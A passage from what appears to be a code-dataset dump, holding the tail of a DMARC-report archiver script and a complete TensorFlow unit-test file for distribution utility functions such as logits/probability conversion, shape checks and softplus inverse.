);\n\t\t\n\t\ttry:\n\t\t\tdb.insert_data(conn, insert_data)\n\t\texcept Exception as e:\n\t\t\tfunction.log(logfile, \"ERR\", str(e)) \n\t\t\n\t\tos.remove(abs_fn)\n","repo_name":"mischmeister/dmarchiver","sub_path":"dmarchiver.py","file_name":"dmarchiver.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39795677810","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport importlib\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import gradient_checker\nfrom tensorflow.python.ops import gradients_impl\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops.distributions import util as distribution_util\nimport tensorflow.python.ops.nn_grad # pylint: disable=unused-import\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.platform import tf_logging\n\n\ndef try_import(name): # pylint: disable=invalid-name\n module = None\n try:\n module = importlib.import_module(name)\n except ImportError as e:\n tf_logging.warning(\"Could not import %s: %s\" % (name, str(e)))\n return module\n\n\nspecial = try_import(\"scipy.special\")\n\n\ndef _logit(x):\n x = np.asarray(x)\n return np.log(x) - np.log1p(-x)\n\n\nclass AssertCloseTest(test.TestCase):\n\n def testAssertCloseIntegerDtype(self):\n x = array_ops.placeholder(dtypes.int32)\n y = x\n z = array_ops.placeholder(dtypes.int32)\n feed_dict = {x: [1, 5, 10, 15, 20], z: [2, 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with ops.control_dependencies([distribution_util.assert_close(y, x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n def testAssertCloseNonIntegerDtype(self):\n x = array_ops.placeholder(dtypes.float32)\n y = x + 1e-8\n z = array_ops.placeholder(dtypes.float32)\n feed_dict = {x: [1., 5, 10, 15, 20], z: [2., 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with ops.control_dependencies([distribution_util.assert_close(y, x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n def testAssertCloseEpsilon(self):\n x = [0., 5, 10, 15, 20]\n # x != y\n y = [0.1, 5, 10, 15, 20]\n # x = z\n z = [1e-8, 5, 10, 15, 20]\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_close(x, z)]):\n array_ops.identity(x).eval()\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(x, y)]):\n array_ops.identity(x).eval()\n\n with self.assertRaisesOpError(\"Condition x ~= y\"):\n with ops.control_dependencies([distribution_util.assert_close(y, z)]):\n array_ops.identity(y).eval()\n\n def testAssertIntegerForm(self):\n # This should only be detected as an integer.\n x = array_ops.placeholder(dtypes.float32)\n y = array_ops.placeholder(dtypes.float32)\n # First component isn't less than float32.eps = 1e-7\n z = array_ops.placeholder(dtypes.float32)\n # This shouldn\"t be detected as an integer.\n w = array_ops.placeholder(dtypes.float32)\n feed_dict = {x: [1., 5, 10, 15, 20], y: [1.1, 5, 10, 15, 20],\n z: [1.0001, 5, 10, 15, 20], w: [1e-8, 5, 10, 15, 20]}\n with self.test_session():\n with ops.control_dependencies([distribution_util.assert_integer_form(x)]):\n array_ops.identity(x).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(y)]):\n array_ops.identity(y).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(z)]):\n array_ops.identity(z).eval(feed_dict=feed_dict)\n\n with self.assertRaisesOpError(\"has non-integer components\"):\n with ops.control_dependencies(\n [distribution_util.assert_integer_form(w)]):\n array_ops.identity(w).eval(feed_dict=feed_dict)\n\n\nclass GetLogitsAndProbsTest(test.TestCase):\n\n def testImproperArguments(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n distribution_util.get_logits_and_probs(logits=None, probs=None)\n\n with self.assertRaises(ValueError):\n distribution_util.get_logits_and_probs(logits=[0.1], probs=[0.1])\n\n def testLogits(self):\n p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)\n logits = _logit(p)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n logits=logits, validate_args=True)\n\n self.assertAllClose(p, new_p.eval(), rtol=1e-5, atol=0.)\n self.assertAllClose(logits, new_logits.eval(), rtol=1e-5, atol=0.)\n\n def testLogitsMultidimensional(self):\n p = np.array([0.2, 0.3, 0.5], dtype=np.float32)\n logits = np.log(p)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n logits=logits, multidimensional=True, validate_args=True)\n\n self.assertAllClose(new_p.eval(), p)\n self.assertAllClose(new_logits.eval(), logits)\n\n def testProbability(self):\n p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n probs=p, validate_args=True)\n\n self.assertAllClose(_logit(p), new_logits.eval())\n self.assertAllClose(p, new_p.eval())\n\n def testProbabilityMultidimensional(self):\n p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)\n\n with self.test_session():\n new_logits, new_p = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n\n self.assertAllClose(np.log(p), new_logits.eval())\n self.assertAllClose(p, new_p.eval())\n\n def testProbabilityValidateArgs(self):\n p = [0.01, 0.2, 0.5, 0.7, .99]\n # Component less than 0.\n p2 = [-1, 0.2, 0.5, 0.3, .2]\n # Component greater than 1.\n p3 = [2, 0.2, 0.5, 0.3, .2]\n\n with self.test_session():\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, validate_args=True)\n prob.eval()\n\n with self.assertRaisesOpError(\"Condition x >= 0\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\"probs has components greater than 1\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, validate_args=False)\n prob.eval()\n\n def testProbabilityValidateArgsMultidimensional(self):\n p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Component less than 0. Still sums to 1.\n p2 = np.array([[-.3, 0.4, 0.9], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Component greater than 1. Does not sum to 1.\n p3 = np.array([[1.3, 0.0, 0.0], [0.1, 0.5, 0.4]], dtype=np.float32)\n # Does not sum to 1.\n p4 = np.array([[1.1, 0.3, 0.4], [0.1, 0.5, 0.4]], dtype=np.float32)\n\n with self.test_session():\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True)\n prob.eval()\n\n with self.assertRaisesOpError(\"Condition x >= 0\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p2, multidimensional=True, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\n \"(probs has components greater than 1|probs does not sum to 1)\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p3, multidimensional=True, validate_args=False)\n prob.eval()\n\n with self.assertRaisesOpError(\"probs does not sum to 1\"):\n _, prob = distribution_util.get_logits_and_probs(\n probs=p4, multidimensional=True, validate_args=True)\n prob.eval()\n\n _, prob = distribution_util.get_logits_and_probs(\n probs=p4, multidimensional=True, validate_args=False)\n prob.eval()\n\n def testProbsMultidimShape(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n p = array_ops.ones([int(2**11+1)], dtype=np.float16)\n distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n p = array_ops.placeholder(dtype=dtypes.float16)\n _, prob = distribution_util.get_logits_and_probs(\n probs=p, multidimensional=True, validate_args=True)\n prob.eval(feed_dict={p: np.ones([int(2**11+1)])})\n\n def testLogitsMultidimShape(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n l = array_ops.ones([int(2**11+1)], dtype=np.float16)\n distribution_util.get_logits_and_probs(\n logits=l, multidimensional=True, validate_args=True)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n l = array_ops.placeholder(dtype=dtypes.float16)\n logit, _ = distribution_util.get_logits_and_probs(\n logits=l, multidimensional=True, validate_args=True)\n logit.eval(feed_dict={l: np.ones([int(2**11+1)])})\n\n\nclass EmbedCheckCategoricalEventShapeTest(test.TestCase):\n\n def testTooSmall(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n param = array_ops.ones([1], dtype=np.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n\n with self.assertRaisesOpError(\n \"must have at least 2 events\"):\n param = array_ops.placeholder(dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n checked_param.eval(feed_dict={param: np.ones([1])})\n\n def testTooLarge(self):\n with self.test_session():\n with self.assertRaises(ValueError):\n param = array_ops.ones([int(2**11+1)], dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n\n with self.assertRaisesOpError(\n \"Number of classes exceeds `dtype` precision\"):\n param = array_ops.placeholder(dtype=dtypes.float16)\n checked_param = distribution_util.embed_check_categorical_event_shape(\n param)\n checked_param.eval(feed_dict={param: np.ones([int(2**11+1)])})\n\n def testUnsupportedDtype(self):\n with self.test_session():\n with self.assertRaises(TypeError):\n param = array_ops.ones([int(2**11+1)], dtype=dtypes.qint16)\n distribution_util.embed_check_categorical_event_shape(param)\n\n\nclass EmbedCheckIntegerCastingClosedTest(test.TestCase):\n\n def testCorrectlyAssertsNonnegative(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements must be non-negative\"):\n x = array_ops.placeholder(dtype=dtypes.float16)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, -1], dtype=np.float16)})\n\n def testCorrectlyAssersIntegerForm(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements must be int16-equivalent.\"):\n x = array_ops.placeholder(dtype=dtypes.float16)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, 1.5], dtype=np.float16)})\n\n def testCorrectlyAssertsLargestPossibleInteger(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements cannot exceed 32767.\"):\n x = array_ops.placeholder(dtype=dtypes.int32)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.int16)\n x_checked.eval(feed_dict={x: np.array([1, 2**15], dtype=np.int32)})\n\n def testCorrectlyAssertsSmallestPossibleInteger(self):\n with self.test_session():\n with self.assertRaisesOpError(\"Elements cannot be smaller than 0.\"):\n x = array_ops.placeholder(dtype=dtypes.int32)\n x_checked = distribution_util.embed_check_integer_casting_closed(\n x, target_dtype=dtypes.uint16, assert_nonnegative=False)\n x_checked.eval(feed_dict={x: np.array([1, -1], dtype=np.int32)})\n\n\nclass LogCombinationsTest(test.TestCase):\n\n def testLogCombinationsBinomial(self):\n n = [2, 5, 12, 15]\n k = [1, 2, 4, 11]\n\n if not special:\n return\n\n log_combs = np.log(special.binom(n, k))\n\n with self.test_session():\n n = np.array(n, dtype=np.float32)\n counts = [[1., 1], [2., 3], [4., 8], [11, 4]]\n log_binom = distribution_util.log_combinations(n, counts)\n self.assertEqual([4], log_binom.get_shape())\n self.assertAllClose(log_combs, log_binom.eval())\n\n def testLogCombinationsShape(self):\n # Shape [2, 2]\n n = [[2, 5], [12, 15]]\n\n with self.test_session():\n n = np.array(n, dtype=np.float32)\n # Shape [2, 2, 4]\n counts = [[[1., 1, 0, 0], [2., 2, 1, 0]], [[4., 4, 1, 3], [10, 1, 1, 4]]]\n log_binom = distribution_util.log_combinations(n, counts)\n self.assertEqual([2, 2], log_binom.get_shape())\n\n\nclass DynamicShapeTest(test.TestCase):\n\n def testSameDynamicShape(self):\n with self.test_session():\n scalar = constant_op.constant(2.0)\n scalar1 = array_ops.placeholder(dtype=dtypes.float32)\n\n vector = [0.3, 0.4, 0.5]\n vector1 = array_ops.placeholder(dtype=dtypes.float32, shape=[None])\n vector2 = array_ops.placeholder(dtype=dtypes.float32, shape=[None])\n\n multidimensional = [[0.3, 0.4], [0.2, 0.6]]\n multidimensional1 = array_ops.placeholder(\n dtype=dtypes.float32, shape=[None, None])\n multidimensional2 = array_ops.placeholder(\n dtype=dtypes.float32, shape=[None, None])\n\n # Scalar\n self.assertTrue(\n distribution_util.same_dynamic_shape(scalar, scalar1).eval({\n scalar1: 2.0\n }))\n\n # Vector\n\n self.assertTrue(\n distribution_util.same_dynamic_shape(vector, vector1).eval({\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertTrue(\n distribution_util.same_dynamic_shape(vector1, vector2).eval({\n vector1: [2.0, 3.0, 4.0],\n vector2: [2.0, 3.5, 6.0]\n }))\n\n # Multidimensional\n self.assertTrue(\n distribution_util.same_dynamic_shape(\n multidimensional, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertTrue(\n distribution_util.same_dynamic_shape(\n multidimensional1, multidimensional2).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]],\n multidimensional2: [[1.0, 3.5], [6.3, 2.3]]\n }))\n\n # Scalar, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar, vector1).eval({\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar1, vector1).eval({\n scalar1: 2.0,\n vector1: [2.0, 3.0, 4.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(scalar1, multidimensional1).eval(\n {\n scalar1: 2.0,\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n\n # Vector, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector, vector1).eval({\n vector1: [2.0, 3.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector1, vector2).eval({\n vector1: [2.0, 3.0, 4.0],\n vector2: [6.0]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector1, multidimensional1).eval(\n {\n vector1: [2.0, 3.0, 4.0],\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n\n # Multidimensional, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(\n multidimensional, multidimensional1).eval({\n multidimensional1: [[1.0, 3.5, 5.0], [6.3, 2.3, 7.1]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(\n multidimensional1, multidimensional2).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]],\n multidimensional2: [[1.0, 3.5, 5.0], [6.3, 2.3, 7.1]]\n }))\n\n\nclass RotateTransposeTest(test.TestCase):\n\n def _np_rotate_transpose(self, x, shift):\n if not isinstance(x, np.ndarray):\n x = np.array(x)\n return np.transpose(x, np.roll(np.arange(len(x.shape)), shift))\n\n def testRollStatic(self):\n with self.test_session():\n with self.assertRaisesRegexp(ValueError, \"None values not supported.\"):\n distribution_util.rotate_transpose(None, 1)\n for x in (np.ones(1), np.ones((2, 1)), np.ones((3, 2, 1))):\n for shift in np.arange(-5, 5):\n y = distribution_util.rotate_transpose(x, shift)\n self.assertAllEqual(self._np_rotate_transpose(x, shift), y.eval())\n self.assertAllEqual(np.roll(x.shape, shift), y.get_shape().as_list())\n\n def testRollDynamic(self):\n with self.test_session() as sess:\n x = array_ops.placeholder(dtypes.float32)\n shift = array_ops.placeholder(dtypes.int32)\n for x_value in (np.ones(\n 1, dtype=x.dtype.as_numpy_dtype()), np.ones(\n (2, 1), dtype=x.dtype.as_numpy_dtype()), np.ones(\n (3, 2, 1), dtype=x.dtype.as_numpy_dtype())):\n for shift_value in np.arange(-5, 5):\n self.assertAllEqual(\n self._np_rotate_transpose(x_value, shift_value),\n sess.run(distribution_util.rotate_transpose(x, shift),\n feed_dict={x: x_value,\n shift: shift_value}))\n\n\nclass PickVectorTest(test.TestCase):\n\n def testCorrectlyPicksVector(self):\n with self.test_session():\n x = np.arange(10, 12)\n y = np.arange(15, 18)\n self.assertAllEqual(x,\n distribution_util.pick_vector(\n math_ops.less(0, 5), x, y).eval())\n self.assertAllEqual(y,\n distribution_util.pick_vector(\n math_ops.less(5, 0), x, y).eval())\n self.assertAllEqual(x,\n distribution_util.pick_vector(\n constant_op.constant(True), x, y)) # No eval.\n self.assertAllEqual(y,\n distribution_util.pick_vector(\n constant_op.constant(False), x, y)) # No eval.\n\n\nclass FillLowerTriangularTest(test.TestCase):\n\n def setUp(self):\n self._rng = np.random.RandomState(42)\n\n def _fill_lower_triangular(self, x):\n \"\"\"Numpy implementation of `fill_lower_triangular`.\"\"\"\n x = np.asarray(x)\n d = x.shape[-1]\n # d = n(n+1)/2 implies n is:\n n = int(0.5 * (np.sqrt(1. + 8. * d) - 1.))\n ids = np.tril_indices(n)\n y = np.zeros(list(x.shape[:-1]) + [n, n], dtype=x.dtype)\n y[..., ids[0], ids[1]] = x\n return y\n\n def testCorrectlyMakes1x1LowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(3, 1))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n\n def testCorrectlyMakesNoBatchLowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(10))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n g = gradients_impl.gradients(\n distribution_util.fill_lower_triangular(x), x)\n self.assertAllEqual(np.tri(4).reshape(-1), g[0].values.eval())\n\n def testCorrectlyMakesBatchLowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(2, 2, 6))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n self.assertAllEqual(\n np.ones((2, 2, 6)),\n gradients_impl.gradients(\n distribution_util.fill_lower_triangular(x), x)[0].eval())\n\n\nclass GenNewSeedTest(test.TestCase):\n\n def testOnlyNoneReturnsNone(self):\n self.assertFalse(distribution_util.gen_new_seed(0, \"salt\") is None)\n self.assertTrue(distribution_util.gen_new_seed(None, \"salt\") is None)\n\n\n# TODO(jvdillon): Merge this test back into:\n# tensorflow/python/kernel_tests/softplus_op_test.py\n# once TF core is accepting new ops.\nclass SoftplusTest(test.TestCase):\n\n def _npSoftplus(self, np_features):\n np_features = np.asarray(np_features)\n zero = np.asarray(0).astype(np_features.dtype)\n return np.logaddexp(zero, np_features)\n\n def _testSoftplus(self, np_features, use_gpu=False):\n np_features = np.asarray(np_features)\n np_softplus = self._npSoftplus(np_features)\n with self.test_session(use_gpu=use_gpu) as sess:\n softplus = nn_ops.softplus(np_features)\n softplus_inverse = distribution_util.softplus_inverse(softplus)\n [tf_softplus, tf_softplus_inverse] = sess.run([\n softplus, softplus_inverse])\n self.assertAllCloseAccordingToType(np_softplus, tf_softplus)\n rtol = {\"float16\": 0.07, \"float32\": 0.003, \"float64\": 0.002}.get(\n str(np_features.dtype), 1e-6)\n # This will test that we correctly computed the inverse by verifying we\n # recovered the original input.\n self.assertAllCloseAccordingToType(\n np_features, tf_softplus_inverse,\n atol=0., rtol=rtol)\n self.assertAllEqual(np.ones_like(tf_softplus).astype(np.bool),\n tf_softplus > 0)\n\n self.assertShapeEqual(np_softplus, softplus)\n self.assertShapeEqual(np_softplus, softplus_inverse)\n\n self.assertAllEqual(np.ones_like(tf_softplus).astype(np.bool),\n np.isfinite(tf_softplus))\n self.assertAllEqual(np.ones_like(tf_softplus_inverse).astype(np.bool),\n np.isfinite(tf_softplus_inverse))\n\n def testNumbers(self):\n for t in [np.float16, np.float32, np.float64]:\n lower = {np.float16: -15, np.float32: -50, np.float64: -50}.get(t, -100)\n upper = {np.float16: 50, np.float32: 50, np.float64: 50}.get(t, 100)\n self._testSoftplus(\n np.array(np.linspace(lower, upper, int(1e3)).astype(t)).reshape(\n [2, -1]),\n use_gpu=False)\n self._testSoftplus(\n np.array(np.linspace(lower, upper, int(1e3)).astype(t)).reshape(\n [2, -1]),\n use_gpu=True)\n log_eps = np.log(np.finfo(t).eps)\n one = t(1)\n ten = t(10)\n self._testSoftplus(\n [\n log_eps, log_eps - one, log_eps + one, log_eps - ten,\n log_eps + ten, -log_eps, -log_eps - one, -log_eps + one,\n -log_eps - ten, -log_eps + ten\n ],\n use_gpu=False)\n self._testSoftplus(\n [\n log_eps, log_eps - one, log_eps + one, log_eps - ten,\n log_eps + ten - log_eps, -log_eps - one, -log_eps + one,\n -log_eps - ten, -log_eps + ten\n ],\n use_gpu=True)\n\n def testGradient(self):\n with self.test_session():\n x = constant_op.constant(\n [-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9],\n shape=[2, 5],\n name=\"x\")\n y = nn_ops.softplus(x, name=\"softplus\")\n x_init = np.asarray(\n [[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],\n dtype=np.float32,\n order=\"F\")\n err = gradient_checker.compute_gradient_error(\n x, [2, 5], y, [2, 5], x_init_value=x_init)\n tf_logging.vlog(2, \"softplus (float) gradient err = \", err)\n self.assertLess(err, 1e-4)\n\n def testInverseSoftplusGradientNeverNan(self):\n with self.test_session():\n # Note that this range contains both zero and inf.\n x = constant_op.constant(np.logspace(-8, 6).astype(np.float16))\n y = distribution_util.softplus_inverse(x)\n grads = gradients_impl.gradients(y, x)[0].eval()\n # Equivalent to `assertAllFalse` (if it existed).\n self.assertAllEqual(np.zeros_like(grads).astype(np.bool), np.isnan(grads))\n\n def testInverseSoftplusGradientFinite(self):\n with self.test_session():\n # This range of x is all finite, and so is 1 / x. So the\n # gradient and its approximations should be finite as well.\n x = constant_op.constant(np.logspace(-4.8, 4.5).astype(np.float16))\n y = distribution_util.softplus_inverse(x)\n grads = gradients_impl.gradients(y, x)[0].eval()\n # Equivalent to `assertAllTrue` (if it existed).\n self.assertAllEqual(\n np.ones_like(grads).astype(np.bool), np.isfinite(grads))\n\n\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"baidu-research/tensorflow-allreduce","sub_path":"tensorflow/python/kernel_tests/distributions/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":27169,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"3"}